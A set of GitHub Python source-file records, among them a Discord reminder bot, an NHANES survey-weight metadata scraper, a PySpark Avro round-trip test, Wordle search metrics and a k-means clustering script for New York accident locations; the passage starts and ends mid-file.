\"13:00\"\r\n elif time == \"2pm\":\r\n return \"14:00\"\r\n elif time == \"3pm\":\r\n return \"15:00\"\r\n elif time == \"4pm\":\r\n return \"16:00\"\r\n elif time == \"5pm\":\r\n return \"17:00\"\r\n elif time == \"6pm\":\r\n return \"18:00\"\r\n elif time == \"7pm\":\r\n return \"19:00\"\r\n elif time == \"8pm\":\r\n return \"20:00\"\r\n elif time == \"9pm\":\r\n return \"21:00\"\r\n elif time == \"10pm\":\r\n return \"22:00\"\r\n elif time == \"11pm\":\r\n return \"23:00\"\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f'We have logged in as {client.user}')\r\n CheckReminders.start()\r\n TodaysReminders.start()\r\n now = dt.now()\r\n current_time = now.strftime(\"%H:%M\")\r\n for i in timeL:\r\n print(f\"{current_time}: reminders stored for {user[timeL.index(i)]} about {remember[timeL.index(i)]} at {i}\")\r\n return\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return\r\n now = dt.now()\r\n current_time = now.strftime(\"%H:%M\")\r\n current_date = now.strftime(\"%d\")\r\n current_month = now.strftime(\"%m\")\r\n id = \"<@\" + str(message.author.id) + \">\"\r\n if message.content.startswith(f'{c[\"prefix\"]}test'):\r\n await message.channel.send(\"I am alive\")\r\n if message.content.startswith(f'{c[\"prefix\"]}rmb'):\r\n temp = message.content.replace(\"$rmb\",\"\")\r\n breakdown = temp.split()\r\n if(breakdown[-1] != None):\r\n if breakdown[-1].lower() == \"today\":\r\n date.append(now.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() == \"tmr\":\r\n dd = int(current_date) + 1\r\n dd = str(dd).zfill(2)\r\n mm = current_month\r\n dd = (dd + \"/\" + mm)\r\n date.append(dd)\r\n elif breakdown[-1].lower() ==\"monday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((0 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"tuesday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((1 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"wednesday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((2 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"thursday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((3 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"friday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((4 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"saturday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((5 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n elif breakdown[-1].lower() ==\"sunday\":\r\n today = datetime.date.today()\r\n day = today + datetime.timedelta((6 - today.weekday()) % 7)\r\n date.append(day.strftime(\"%d/%m\"))\r\n else:\r\n date.append(now.strftime(\"%d/%m\"))\r\n time = re.search(\"([0-1]?[0-9]|2[0-3]):[0-5][0-9]\",temp)\r\n if(time != None):\r\n temp = temp.replace(time.group(), \"\").rstrip()\r\n user.append(id)\r\n remember.append(temp)\r\n timeL.append(time.group())\r\n print(user[-1], remember[-1], timeL[-1])\r\n await message.channel.send(f\"{id}I will remind you about{temp} at {time.group()}\")\r\n time = re.search(\"([0-9]|1[0-2])([AaPp][Mm])\",temp)\r\n if (time != None):\r\n temp = temp.replace(time.group(), \"\").rstrip()\r\n time = str(time.group())\r\n print(time)\r\n time = 
HHtoHHMM(time.lower())\r\n            print(time)\r\n            user.append(id)\r\n            remember.append(temp)\r\n            timeL.append(time)\r\n            print(f\"{current_time}: reminder added for {id} about {temp} at {time}\")\r\n            await message.channel.send(f\"{id}I will remind you about {temp} at {time}\")\r\n        updateFile()\r\n        return\r\n    if message.content.startswith(f'{c[\"prefix\"]}clearall'):\r\n        # clear every stored reminder; deleting entries while iterating over timeL would skip items\r\n        user.clear()\r\n        remember.clear()\r\n        date.clear()\r\n        timeL.clear()\r\n        updateFile()\r\n        await message.channel.send(f\"{id}, all reminders cleared!\")\r\n    if message.content.startswith(f'{c[\"prefix\"]}showall'):\r\n        await message.channel.send(f\"{id}, reminders you have are:\")\r\n        for i in timeL:\r\n            print(f\"{current_time}: reminders stored for {user[timeL.index(i)]} about {remember[timeL.index(i)]} at {i}\")\r\n            await message.channel.send(f\"{user[timeL.index(i)]}, reminders about {remember[timeL.index(i)]} at {i} {date[timeL.index(i)]}\")\r\n    if message.content.startswith(f'{c[\"prefix\"]}here'):\r\n        channelid = message.channel.id\r\n        with open('channelid.txt', 'w') as f:\r\n            f.write(str(channelid))\r\n        await message.channel.send(f\"{id}, I will announce reminders in this channel now\")\r\n#check for reminders every second\r\n@tasks.loop(seconds=1)\r\nasync def CheckReminders():\r\n    BotChannel = client.get_channel(cid)\r\n    now = dt.now()\r\n    current_time = now.strftime(\"%H:%M\")\r\n    current_date = now.strftime(\"%d/%m\")\r\n    # iterate over copies, since announced reminders are deleted from the lists below\r\n    for x in list(date):\r\n        if current_date == x:\r\n            for i in list(timeL):\r\n                if current_time == i:\r\n                    print(f\"{current_time}: announcing reminder for {user[timeL.index(i)]} about {remember[timeL.index(i)]}\")\r\n                    await BotChannel.send(f\"{user[timeL.index(i)]}, reminder about {remember[timeL.index(i)]}\")\r\n                    del user[timeL.index(i)]\r\n                    del remember[timeL.index(i)]\r\n                    del date[timeL.index(i)]\r\n                    del timeL[timeL.index(i)]\r\n                    updateFile()\r\n#every minute, announce any reminders due today\r\n@tasks.loop(minutes=1)\r\nasync def TodaysReminders():\r\n    BotChannel = client.get_channel(cid)\r\n    now = dt.now()\r\n    current_time = now.strftime(\"%H:%M\")\r\n    current_date = now.strftime(\"%d/%m\")\r\n    print(f\"{current_time} checking for reminders today\")\r\n    for x in date:\r\n        if current_date == x:\r\n            for i in timeL:\r\n                if current_time == i:\r\n                    print(\r\n                        f\"{current_time}: announcing reminder for {user[timeL.index(i)]} about {remember[timeL.index(i)]}\")\r\n                    await BotChannel.send(f\"{user[timeL.index(i)]}, reminder about {remember[timeL.index(i)]}\")\r\n\r\nclient.run(c['token'])","repo_name":"ruodeee/Simple-Reminder-bot-discord-bot","sub_path":"Reminder_bot.py","file_name":"Reminder_bot.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72317613635","text":"# -*- coding: utf-8 -*-\n\n# basic setup class types\nfrom nnsim.module import Module, ModuleList\nfrom nnsim.nnsimChannel import Channel as Ch\nfrom nnsim.nnsimRecorder import nnsimRecorder\n\n# class types depending on the model\nfrom arithmetic import mac\nfrom sp import WeightsSP\n\n# ======================================================================= \n# 1. there are three types of scratchpad memory: weights, ifmap, psum\n# 2. each scratchpad has only one bank \n# 3. 
there is only one MAC in the PE\n# ======================================================================= \n\nclass PE(Module):\n \n def instantiate(self, setup):\n \n self.class_name = 'PE'\n self.row = setup['row']\n self.col = setup['col']\n self.debug = 'PE[' + str(self.row) + ']' + '[' + str(self.col) + ']'\n \n # ================================================================\n # Stats Related Setup \n # ================================================================\n self.component_class_specification_stats = 'hide'\n self.component_specification_stats = 'show'\n self.access_counts_stats = 'show'\n self.recorder = nnsimRecorder()\\\n if self.traces_stats == 'show'\\\n else None\n # =================================================================\n # IO Channels\n # =================================================================\n self.weights_data_in_chn = ModuleList(setup['weights_data_in_chn'])\n self.ifmap_data_in_chn = ModuleList(setup['ifmap_data_in_chn'])\n self.psum_data_in_chn = ModuleList(setup['psum_data_in_chn'])\n self.psum_data_out_chn = ModuleList(setup['psum_data_out_chn'])\n \n # =================================================================\n # Hardware components \n # =================================================================\n # >>>> weights scratchpad (reg)\n self.weights_reader = ModuleList(Ch())\n weights_sp_setup = {'fill_data_ichns': self.weights_data_in_chn,\\\n 'drain_data_ochns': self.weights_reader,\\\n 'num_logical_managers': 1,\\\n 'SRAM': {'depth': setup['wsp_depth'],\\\n 'width': setup['wsp_width'],\\\n 'data_width': setup['wsp_data_width'],\\\n 'nports': setup['wsp_nports'],\\\n 'nbanks': setup['wsp_nbanks'], \\\n 'port_type': setup['wsp_port_type']},\\\n 'debug': self.debug + '_weights_sp'}\n \n self.weight_sp = WeightsSP(weights_sp_setup)\n \n \n # >>>> mac unit\n mac_setup = {'opa_chn': self.ifmap_data_in_chn[0],\\\n 'opb_chn': self.weights_reader[0], \\\n 'opc_chn': self.psum_data_in_chn[0],\\\n 'result_chn': self.psum_data_out_chn[0],\\\n 'latency': setup['mac_latency'],\\\n 'debug': self.debug} \n \n self.mac = mac(mac_setup)\n \n \n def configure(self, config):\n weights_sp_config = config['WeightsSp']\n weights_sp_config['shape_mapping_info'] = config['shape_mapping_info']\n self.weight_sp.configure(weights_sp_config)\n \n self.clk_gated = config['clk_gated']\n self.mac.configure({'clk_gated': self.clk_gated})\n \n\n\n \n \n ","repo_name":"emma-mens/dl-hardware-project","sub_path":"designs/ws_chip/model/pe.py","file_name":"pe.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15795264642","text":"import sys, os, csv, codecs, re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom xml.dom.minidom import parseString\n\ndef load_components():\n ifile = open('components', 'r')\n components = []\n for line in ifile.readlines():\n line = line.strip()\n if line == \"\" or line[0] == \"#\": continue\n parts = line.split()\n if len(parts) == 2:\n comp_name = parts[0]\n components.append(comp_name)\n ifile.close()\n return components\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\ndef clean_xml_string(str):\n # Removing EOL characters \n str = str.replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n # Removing less/greater signs to avoid problems with XML \n str = str.replace(\"<=\", \"less or equal than\").replace(\">=\", \"greater or equal than\")\n str = str.replace(\"<\", \"less than 
\").replace(\">\", \"greater than\")\n # Likewise for the '&' character\n str = str.replace(\"&\", \"and\")\n # Removing the \":\" and \";\" characters, used to separate the data values\n str = str.replace(\";\", \"\").replace(\":\", \"\")\n return str\n\ndef int_or_float(datafile, name):\n file = open(datafile, 'r', encoding='latin1') \n reader = csv.reader(file, delimiter=',', quotechar='\"')\n # The replace is needed because the variable names in the source csv files\n # use \".\" instead of \"_\" even though the variable name in the codebook has\n # \"_\" \n title = [x.upper().replace(\".\", \"_\") for x in next(reader)]\n if not name in title:\n file.close()\n return None \n col = title.index(name) \n type = \"integer\" \n for row in reader:\n dat = row[col] \n try:\n value = float(dat)\n if not value.is_integer():\n type = \"float\"\n except ValueError:\n # invalid numeric value, this will be catched when checking metadata \n continue\n file.close()\n return type\n \ndef get_variable_type_and_range(short_name, full_name, table, datafile):\n var_type = None\n var_range = None\n val_list = table.tbody.find_all(\"tr\")\n for val in val_list:\n td_list = val.find_all(\"td\")\n val_code = td_list[0].text\n val_desc = td_list[1].text\n if val_desc == \"Range of Values\" or (is_number(val_code) and val_desc == val_code and var_type == None):\n if -1 < val_code.find(\" to \"): \n var_range = val_code.replace(\" to \", \",\")\n else:\n # Single value?\n var_range = val_code + \",\" + val_code\n print(\" Warning: range of numeric variable \" + short_name + \" has a single value \" + val_code)\n if var_range == \"00:00,23:59\" or -1 < full_name.find(\"HH:MM\") or -1 < full_name.find(\"HHMM\"):\n var_type = \"time\" \n else:\n if -1 < var_range.find(\".\"):\n # If the range contains a decimal point, we know is a float value\n var_type = \"float\"\n else:\n # Otherwise we need to go through the data\n # Send to a function that checks for integer or float which returns \"integer\" or \"float\"\n # then var_type = the returned value\n if os.path.exists(datafile):\n var_type = int_or_float(datafile, short_name) \n else:\n # Data file doesn't exist, variable won't be added because its type\n # will remain undefined.\n break \n elif val_desc == \"Value was recorded\" or (var_type == None and (val_desc.find(\"<\") == 0 or val_desc.isdigit())):\n var_type = \"recorded\"\n var_range = \"\" \n break \n else:\n if var_type == None: \n var_type = \"category\" \n if val_code != \".\" and val_desc != \"Missing\":\n if var_range == None: var_range = \"\" \n \n val_desc = clean_xml_string(val_desc)\n\t\t\t\t\t\t\n if var_type != \"integer\":\n if var_range != \"\" : var_range += \";\"\n var_range += val_code + \":\" + val_desc \n else:\n # Expanding the range when there is an additional cap value\n expand = 0\n\n try:\n endpoints = [int(x) for x in var_range.split(\",\")]\n except ValueError:\n endpoints = [] \n\n if len(endpoints) == 2:\n val = int(val_code) \n if val == endpoints[1] + 1: \n endpoints[1] = val\n expand = 1\n if val == endpoints[0] - 1: \n endpoints[0] = val\n expand = 1\n\n if expand: \n var_range = str(endpoints[0]) + \",\" + str(endpoints[1]) \n else:\n var_range += \";\" + val_code + \":\" + val_desc\n\n return [var_type, var_range] \n\ndef write_xml_line(line):\n xml_file.write(line + '\\n')\n xml_strings.append(line + '\\n')\n\ndef get_component_weights(component, year, parser):\n request_url = \"http://wwwn.cdc.gov/nchs/nhanes/search/datapage.aspx?Component=\" + component + 
\"&CycleBeginYear=\" + year\n html_doc = None\n for i in range(0, 5):\n try:\n html_doc = requests.get(request_url)\n break; \n except:\n html_doc = None \n if i < 5 - 1: print(\" Warning: Could not open \" + request_url + \", will try again\")\n if html_doc == None:\n sys.stderr.write(\"Error: Failed opening \" + request_url + \" after 5 attempts\\n\")\n sys.exit(1)\n \n html_soup = BeautifulSoup(html_doc.text, parser)\n \n if component == \"Demographics\":\n subsample_weight = '\"no\"'\n else:\n subsample_weight = '\"yes\"'\n \n # Getting all the codebooks in listed in the datapage\n for table in html_soup.find_all('table'): \n links = table.find_all('a')\n for link in links:\n codebook_url = link['href']\n \n path, ext = os.path.splitext(codebook_url)\n if ext.lower() == \".htm\" or ext.lower() == \".html\":\n \n codebook_url = base_url + codebook_url\n print(codebook_url)\n\n codebook_doc = None\n for i in range(0, 5):\n try:\n codebook_doc = requests.get(codebook_url)\n break; \n except:\n codebook_doc = None \n if i < 5 - 1: print(\" Warning: Could not open \" + codebook_url + \", will try again\")\n if codebook_doc == None:\n sys.stderr.write(\"Error: Failed opening \" + codebook_url + \"after 5 attempts\\n\")\n sys.exit(1)\n \n print(\"Extracting metadata from codebook \" + codebook_url + \"...\")\n codebook_soup = BeautifulSoup(codebook_doc.text, parser)\n\n header = codebook_soup.find(\"div\", {\"id\": \"PageHeader\"}) \n if header == None: continue\n \n header_table_name = header.find(\"h3\") \n table_name = header_table_name.contents[0].strip().replace(\"&\", \"and\")\n \n header_data_file = header.find(\"h4\") \n data_file = header_data_file.contents[0].split(\":\")[1].strip()\n data_filename = os.path.splitext(data_file)[0].upper()\n csv_data_filepath = os.path.abspath(os.path.join(data_folder, data_filename + \".csv\"))\n csv_data_relpath = os.path.join(data_folder, data_filename + \".csv\")\n\n codebook = codebook_soup.find(\"div\", {\"id\": \"Codebook\"})\n if codebook == None: continue\n variables = codebook.find_all(\"div\", {\"class\": \"pagebreak\"})\n \n has_seqn = False\n xml_lines = []\n table_vars = [] \n for var in variables:\n var_info = var.find(\"dl\")\n if not var_info: \n print(\" Warning: codebook for '\" + str(var) + \"' seems malformed, skipping\")\n continue\n var_table = var.find(\"table\")\n info = var_info.find_all(\"dd\")\n \n if 0 < len(info):\n short_name = clean_xml_string(info[0].contents[0]).upper()\n else:\n print(\" Warning: variable without short name, skipping\")\n continue\n \n short_name = short_name.strip()\n if short_name == \"\":\n print(\" Warning: variable without short name, skipping\")\n continue\n \n if short_name == \"SEQN\":\n has_seqn = True\n \n full_name = \"\"\n if 1 < len(info) and 0 < len(info[1].contents):\n # Trying to get full name from SAS label\n full_name = clean_xml_string(info[1].contents[0])\n \n full_name = full_name.strip()\n if full_name == \"\": \n print(\" Warning: variable \" + short_name + \" doesn't have full name, skipping\")\n continue \n\n fnl = full_name.lower()\n if -1 < fnl.find(\"weight\") and (-1 < fnl.find(\"interview\") or -1 < fnl.find(\"mec\") or -1 < fnl.find(\"sample\") or -1 < fnl.find(\"environmental\")):\n include_weight = '\"yes\"'\n if -1 < fnl.find(\"jack knife\"):\n include_weight = '\"no\"'\n \n if var_table == None:\n print(\" Warning: variable \" + full_name + \" (\" + short_name + \") doesn't have a value table, skipping\")\n continue\n \n (var_type, var_range) = 
get_variable_type_and_range(short_name, full_name, var_table, csv_data_filepath)\n \n if var_type != \"float\":\n print(\" Warning: wrong type for weight variable \" + full_name + \" (\" + short_name + \")\")\n continue\n \n if var_range == None:\n print(\" Warning: Cannot find type/range for weight variable \" + full_name + \" (\" + short_name + \")\")\n continue \n \n weight_vars.append(short_name)\n if not short_name in sample_weights:\n name_ext = os.path.split(csv_data_relpath)[1]\n tname = name_ext.split(\".\")[0]\n short_name = short_name + \".\" + tname\n \n xml_lines.append(' ' + short_name + '' + full_name + '' + var_type + '' + var_range + '' + csv_data_relpath + '')\n \n if has_seqn:\n if component == \"Demographics\":\n for line in xml_lines: sample_xml_lines.append(line)\n elif component == \"Dietary\": \n for line in xml_lines: dietary_xml_lines.append(line)\n else:\n for line in xml_lines: subsample_xml_lines.append(line) \n elif table_vars: \n print(\" Warning: SEQN variable not found in this table (\" + table_name + \"), skipping weights variables \" + table_vars)\n \n \nbase_url = \"https://wwwn.cdc.gov\"\n\ndata_cycle = sys.argv[1] \ndata_folder = sys.argv[2]\nxml_filename = sys.argv[3]\n\nhtml_parser = \"html.parser\"\nif len(sys.argv) == 6 and sys.argv[4] == \"-parser\":\n html_parser = sys.argv[5] \n\ndata_components = load_components()\nbegin_year = data_cycle.split(\"-\")[0]\n\nsample_weights = [\"WTINT2YR\", \"WTMEC2YR\", \"WTINT4YR\", \"WTMEC4YR\"]\nweight_vars = []\nsample_xml_lines = []\ndietary_xml_lines = []\nsubsample_xml_lines = []\n\nfor component in data_components:\n get_component_weights(component, begin_year, html_parser)\n \n# Writing file in utf-8 because the input html files from\n# NHANES website sometimes have characters output the ASCII range.\nxml_file = codecs.open(xml_filename, \"w\", \"utf-8\")\nxml_strings = []\n\nwrite_xml_line('')\nwrite_xml_line('')\n \nif sample_xml_lines: \n write_xml_line(' ') \n for line in sample_xml_lines: write_xml_line(line)\n write_xml_line('
')\n\nif dietary_xml_lines:\n write_xml_line(' ') \n for line in dietary_xml_lines: write_xml_line(line)\n write_xml_line('
')\n \nif subsample_xml_lines: \n write_xml_line(' ') \n for line in subsample_xml_lines: write_xml_line(line)\n write_xml_line('
')\n\nwrite_xml_line('
')\nxml_file.close()\n\n# For XML validation.\ntry:\n doc = parseString(''.join(xml_strings))\n doc.toxml()\n print(\"Done.\")\nexcept:\n sys.stderr.write(\"XML validation error:\\n\")\n raise\n","repo_name":"mirador/nhanes","sub_path":"getweights.py","file_name":"getweights.py","file_ext":"py","file_size_in_byte":14223,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"7725307614","text":"import io\nimport json\nimport avro.schema\nfrom avro.io import BinaryDecoder, DatumReader, DatumWriter, BinaryEncoder\nfrom pyspark import SparkContext, SparkConf\n\nschema_str = \"{\\\"namespace\\\":\\\"com.ey.cust\\\",\\\"type\\\":\\\"record\\\",\\\"name\\\":\\\"Customer\\\",\\\"fields\\\":[{\\\"name\\\":\\\"consumerId\\\",\\\"type\\\":[\\\"null\\\",\\\"string\\\"],\\\"default\\\":null},{\\\"name\\\":\\\"customerName\\\",\\\"type\\\":\\\"string\\\"},{\\\"name\\\":\\\"customerZip\\\",\\\"type\\\":\\\"string\\\"}]}\"\npayload_str = \"{\\\"consumerId\\\": \\\"A00AD3\\\", \\\"customerName\\\": \\\"Charlie\\\", \\\"customerZip\\\": \\\"fdsfd\\\"}\"\n\n\ndef deserialize_avro(binary_data, schema):\n \"\"\"\n Function used to deserialize an avro binary data\n :param schema: avro schema of binary data\n :param binary_data: event data in binary encoded (bytes)\n :return: deserialized data and corresponding schema\n \"\"\"\n bytes_reader = io.BytesIO(binary_data)\n decoder = BinaryDecoder(bytes_reader)\n reader = DatumReader(schema)\n data = reader.read(decoder)\n return data, schema\n\n\ndef serialize_avro(payload_str, schema):\n \"\"\"\n Function used to serialize a json event to binary format based on avro schema\n :param schema: avro schema of payload\n :param payload_str: event data in json string format\n :return: avro serialized binary data and corresponding schema\n \"\"\"\n payload_json = json.loads(payload_str)\n writer = DatumWriter(schema)\n bytes_writer = io.BytesIO()\n encoder = BinaryEncoder(bytes_writer)\n writer.write(payload_json, encoder)\n raw_bytes = bytes_writer.getvalue()\n return raw_bytes, schema\n\n\navro_schema = avro.schema.parse(schema_str)\nconf = SparkConf()\nconf.setAppName('test_pyspark')\nconf.set(\"spark.driver.host\", \"127.0.0.1\")\nsc = SparkContext(conf=conf)\narr = (sc.parallelize([(payload_str, avro_schema)])\n .map(lambda payload_schema_pair: serialize_avro(payload_schema_pair[0], payload_schema_pair[1]))\n .map(lambda bytes_schema_pair: deserialize_avro(bytes_schema_pair[0], bytes_schema_pair[1]))\n .collect())\n\nprint(arr)\n\n","repo_name":"xchen011/pyspark_avro","sub_path":"test_pyspark.py","file_name":"test_pyspark.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2361178616","text":"\"\"\"Module of metrics for Wordle greedy search algorithm\"\"\"\n\nfrom typing import Union\n\nimport numpy as np\n\nfrom wordle._types import FloatArrayType, IntArrayType, UIntArrayType\n\nResponseDType = Union[np.uint8, np.uint16, np.uint32]\n\n\ndef score(\n metric: str,\n array: UIntArrayType,\n possible_guesses: IntArrayType,\n possible_answers: IntArrayType,\n) -> FloatArrayType:\n \"\"\"\n Score the array of responses on the provided metric,\n given the possible guesses and answers.\n \"\"\"\n return _metrics[metric](array, possible_guesses, possible_answers)\n\n\ndef _expected_value(\n array: UIntArrayType, possible_guesses: IntArrayType, possible_answers: IntArrayType\n) -> FloatArrayType:\n \"\"\"\n Calculate 
the expected number of possible answers for each possible guess, given\n an existing set of possible answers, corrected for the possibility that the guess\n can be correct.\n \"\"\"\n mean_num_left = []\n for guess_ind in possible_guesses:\n row = array[guess_ind]\n _, counts = np.unique(row, return_counts=True) # type: ignore\n mean_num_left.append(counts.dot(counts))\n can_be_correct = np.isin(possible_guesses, possible_answers, assume_unique=True) # type: ignore\n return (np.array(mean_num_left) - can_be_correct) / array.shape[1] # type: ignore\n\n\ndef _minimax(\n array: UIntArrayType, possible_guesses: IntArrayType, possible_answers: IntArrayType\n) -> FloatArrayType:\n \"\"\"\n Calculate the maximum number of possible answers for each possible guess, given\n an existing set of possible answers. The possibility that the guess can be correct\n is used as a potential tiebreaker. See also:\n https://en.wikipedia.org/wiki/Minimax\n \"\"\"\n max_num_left = []\n for guess_ind in possible_guesses:\n row = array[guess_ind]\n _, counts = np.unique(row, return_counts=True) # type: ignore\n max_num_left.append(counts.max())\n can_be_correct = np.isin(possible_guesses, possible_answers, assume_unique=True) # type: ignore\n return np.array(max_num_left) - can_be_correct * 0.1 # type: ignore\n\n\ndef _partitions(\n array: UIntArrayType, possible_guesses: IntArrayType, possible_answers: IntArrayType\n) -> FloatArrayType:\n \"\"\"\n Calculate the number of possible responses for each possible guess, given\n an existing set of possible answers. This is negated since we want to maximize this, i.e.\n we'd like to spread out the possible answers into as many groups as possible. The\n possibility that the guess can be correct is used as a potential tiebreaker.\n \"\"\"\n partitions = []\n for guess_ind in possible_guesses:\n row = array[guess_ind]\n partitions.append(np.unique(row).shape[0]) # type: ignore\n can_be_correct = np.isin(possible_guesses, possible_answers, assume_unique=True) # type: ignore\n return -np.array(partitions) - can_be_correct * 0.1 # type: ignore\n\n\ndef _entropy(\n array: UIntArrayType, possible_guesses: IntArrayType, _unused: IntArrayType\n) -> FloatArrayType:\n \"\"\"\n Calculate the Shannon entropy of the probability distribution of responses for each guess, given\n an existing set of possible answers. Shannon entropy can be thought of as the average level of \"information\"\n contained in a response, so this is negated since we want to maximize this. 
See also:\n    https://en.wikipedia.org/wiki/Entropy_(information_theory)\n    \"\"\"\n    entropies = []\n    for guess_ind in possible_guesses:\n        row = array[guess_ind]\n        _, counts = np.unique(row, return_counts=True)  # type: ignore\n        probs = counts / row.shape[0]\n        entropies.append(probs.dot(np.log(probs)))\n    return np.array(entropies)\n\n\n_metrics = {\n    \"expected_value\": _expected_value,\n    \"minimax\": _minimax,\n    \"partitions\": _partitions,\n    \"entropy\": _entropy,\n}\n","repo_name":"matteosox/sundry-musings","sub_path":"src/wordle/_metrics.py","file_name":"_metrics.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"32407478005","text":"\"\"\"\nCS591\nProject 2\n11.12.17\ngetKmeansNY.py\n\"\"\"\nimport urllib.request\nimport json\nimport dml\nimport prov.model\nimport datetime\nimport uuid\nimport requests\nimport math\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport random\n\n#prevents deprecation warnings, a known and fixed issue\n#(see https://stackoverflow.com/questions/36892390/deprecationwarning-in-sklearn-minibatchkmeans)\nimport warnings \nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\n\n\n#our algorithm\nclass FindKMeans():\n    #the largest acceptable distance between a data point and its cluster centroid\n    \n    coordinates = []\n\n    def __init__(self,distance):\n        # convert miles input to lat/long degrees\n        self.acceptableDistance = distance / 69 # 1° ≈ 69 miles\n\n    #takes all the coordinates and the kmeans cluster and returns the highest distance between\n    #any point and its respective centroid \n    def getMaxDistance(self,kmeans, coordinates):\n        maxDistance = 0\n        for i in range(len(coordinates)):\n\n            clusterCenter = kmeans.predict([coordinates[i]])\n\n            current = self.distance(kmeans.cluster_centers_[clusterCenter][0],coordinates[i])\n\n            if(current > maxDistance):\n                maxDistance = current\n        return maxDistance\n\n    def getAvgDistance(self,kmeans, coordinates):\n        totalDistance = 0\n        for i in range(len(coordinates)):\n            clusterCenter = kmeans.predict([coordinates[i]])\n            totalDistance += self.distance(kmeans.cluster_centers_[clusterCenter][0],coordinates[i])\n        return totalDistance/len(coordinates)\n    \n    #returns the planar distance between two long/lat points\n    #(a great-circle alternative is sketched further below)\n    def distance(self,p0, p1):\n        return math.sqrt((p0[0] - p1[0])**2 + (p0[1] - p1[1])**2)\n\n\n    def execute(self,toggle,trial = False):\n        #param: toggle - true for average or false for max distance\n        '''Cluster New York accident coordinates and return the centroids.'''\n        startTime = datetime.datetime.now()\n        #print('Finding optimal number of means')\n        # Set up the database connection.\n        client = dml.pymongo.MongoClient()\n        repo = client.repo\n        repo.authenticate('alanbur_aquan_erj826_jcaluag', 'alanbur_aquan_erj826_jcaluag') \n        repo.dropCollection(\"alanbur_aquan_erj826_jcaluag.kMeansNY\")\n        repo.createCollection(\"alanbur_aquan_erj826_jcaluag.kMeansNY\")\n\n        #get coordinates from collection\n        collection = repo.alanbur_aquan_erj826_jcaluag.parseNYaccidents\n\n        coordinates = []\n\n        for entry in collection.find():\n            try: #make the array for kmeans\n                datapoint = [entry['latitude'],entry['longitude']]\n                coordinates.append(datapoint)\n            except:\n                continue\n\n        SampleSize=100\n        if trial:\n            TrialSample=coordinates[:SampleSize]\n            for i in range(SampleSize+1,len(coordinates)):\n                j=random.randint(1,i)\n                if j<SampleSize:\n                    TrialSample[j]=coordinates[i]\n            coordinates=TrialSample\n\n        avgOrMaxDistToggle = toggle\n        X = np.array(coordinates)\n        clusters = 1\n        kmeans = KMeans(n_clusters=clusters, random_state=0).fit(X)\n        if(avgOrMaxDistToggle):\n            metric = self.getAvgDistance(kmeans,coordinates)\n        else:\n            metric = self.getMaxDistance(kmeans,coordinates)\n        #keep adding clusters until every point sits close enough to a centroid\n        while(metric > self.acceptableDistance):\n            #print(\"the metric is: \" + str(metric))\n            clusters+=1\n            kmeans = KMeans(n_clusters=clusters, random_state=0).fit(X) \n            
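# Great-circle aside (sketch only; this class keeps the planar distance()
# defined above): treating degrees as planar units is exact for latitude but
# overstates longitude away from the equator. A haversine variant in miles:
#
#     def haversine_miles(p0, p1):
#         lat0, lon0, lat1, lon1 = map(math.radians, [p0[0], p0[1], p1[0], p1[1]])
#         a = math.sin((lat1 - lat0) / 2) ** 2 + \
#             math.cos(lat0) * math.cos(lat1) * math.sin((lon1 - lon0) / 2) ** 2
#         return 2 * 3958.8 * math.asin(math.sqrt(a))  # mean Earth radius in miles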
if(avgOrMaxDistToggle):\n                metric = self.getAvgDistance(kmeans,coordinates)\n            else:\n                metric = self.getMaxDistance(kmeans,coordinates)\n        # print(\"we're done! the \" + str({True: \"avg\", False: \"max\"} [avgOrMaxDistToggle])+ \" distance is: \" + str(metric) + \" at \" + str(clusters) + \" clusters!\")\n        \n        #collect the centroids into a plain list for returning\n        n=[]\n        centroids = kmeans.cluster_centers_.tolist()\n        for each in centroids:\n            n += [each]\n\n        # return centroids\n        # print(repo['alanbur_aquan_erj826_jcaluag.kMeansNY'].metadata())\n        repo.logout()\n        endTime = datetime.datetime.now()\n\n        return n\n\n\n\n\n\n\n# FindKMeans.execute(False)\n\n## eof\n","repo_name":"data-mechanics/course-2017-fal-proj","sub_path":"alanbur_aquan_erj826_jcaluag/find_kmeans.py","file_name":"find_kmeans.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"43267306593","text":"from typing import List\n\nclass Solution:\n    def longestOnes(self, nums: List[int], k: int) -> int:\n        # Sliding window: when the zero count exceeds k, do not reset the window\n        # all at once -- advance the left edge l one step at a time\n        if not nums:\n            return 0\n        l = 0\n        zeros = 0\n        res = 0\n        for i in range(len(nums)):\n            if not nums[i]:\n                zeros += 1\n            \n            while l <= 